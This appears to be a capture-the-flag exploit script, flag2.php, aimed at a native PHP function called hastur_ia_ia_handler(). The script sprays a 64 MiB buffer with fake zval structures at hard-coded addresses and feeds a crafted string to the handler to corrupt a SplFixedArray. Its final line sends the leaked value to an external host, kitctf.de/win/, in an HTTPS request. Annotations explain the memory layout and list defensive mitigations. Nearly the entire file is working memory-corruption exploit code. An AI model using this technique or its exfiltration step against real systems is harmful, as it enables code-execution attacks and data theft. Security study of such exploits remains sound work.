flag2.php
<?php
// Proof-of-concept script against hastur_ia_ia_handler(), which is not defined
// in this file (presumably a native extension function — TODO confirm).
// It prepares three large allocations, calls that function with crafted
// arguments, then sends $victim[0] to an external host.
// NOTE(review): the author's field labels below (value.str.val, refcount__gc,
// type) look like the PHP 5 zval layout with 4-byte pointers — confirm the
// target build. The two 4-byte addresses are hard-coded, so the script assumes
// a predictable address-space layout.
// Defensive notes: the allocations need roughly 64 MiB + 8 MiB plus the
// SplFixedArray, so a restrictive memory_limit would presumably stop the
// script early; the final step depends on outbound HTTPS being permitted.

// 64 MiB buffer (1<<26 bytes) of filler.
$payload = str_repeat('a', (1<<26));
// Write the same 16-byte record at every 0x1000-byte (4 KiB) stride.
for ($i = 0; $i < (1<<26); $i += 0x1000) {
// value.str.val: four bytes, little-endian 0xf73a9080 (a hard-coded address)
$payload[$i] = "\x80";
$payload[$i+1] = "\x90";
$payload[$i+2] = "\x3a";
$payload[$i+3] = "\xf7";
// value.str.len: little-endian 0x40 (64)
$payload[$i+4] = "\x40";
$payload[$i+5] = "\0";
$payload[$i+6] = "\0";
$payload[$i+7] = "\0";
// refcount__gc: little-endian 1
$payload[$i+8] = "\1";
$payload[$i+9] = "\0";
$payload[$i+10] = "\0";
$payload[$i+11] = "\0";
// type: 0x06 (presumably IS_STRING, matching the str.val/str.len fields above)
$payload[$i+12] = "\x06";
// reference flag, followed by two zero bytes that complete the 16-byte record
$payload[$i+13] = "\0";
$payload[$i+14] = "\0";
$payload[$i+15] = "\0";
}
// Second argument to the handler: 502 filler bytes.
$name = str_repeat('a', 502);
// number of non-dot characters
$n = 513;
// $n / 513 evaluates to 1, so the length is (1<<23) - 1 + 513 dots.
$text = str_repeat('.', (1<<23) - ($n / 513) + $n);
// Offsets 16871 .. 16871+24: first 25 of the 513 non-dot bytes.
for ($i = 16871; $i < 16871 + 25; ++$i)
$text[$i] = 'a';
// reliable pointer to our fake ZVal
// Four bytes, little-endian 0xf3011018 (a hard-coded address).
$text[16871 + 25] ="\x18";
$text[16871 + 26] ="\x10";
$text[16871 + 27] ="\x01";
$text[16871 + 28] ="\xf3";
// $i is 16871+25 after the loop above; skip past the four address bytes.
$i += 4;
// Fill the rest of the 513-byte run (up to offset 16871+512) with 'a'.
for (;$i < 16871 + 513; ++$i)
$text[$i] = 'a';
// 1<<21 slots, all initially null; $victim[0] is read back after the call.
$victim = new SplFixedArray(1<<21);
// Call under test; the script does not pass $victim here, so a non-null
// $victim[0] afterwards would mean the call modified memory it was not given.
hastur_ia_ia_handler($text, $name);
// Sends urlencode($victim[0]) in the URL path of an outbound HTTPS request.
// Egress filtering or allow_url_fopen=Off would block this step, and a
// request to this host/path is a usable detection indicator.
file_get_contents('https://kitctf.de/win/'. urlencode($victim[0]));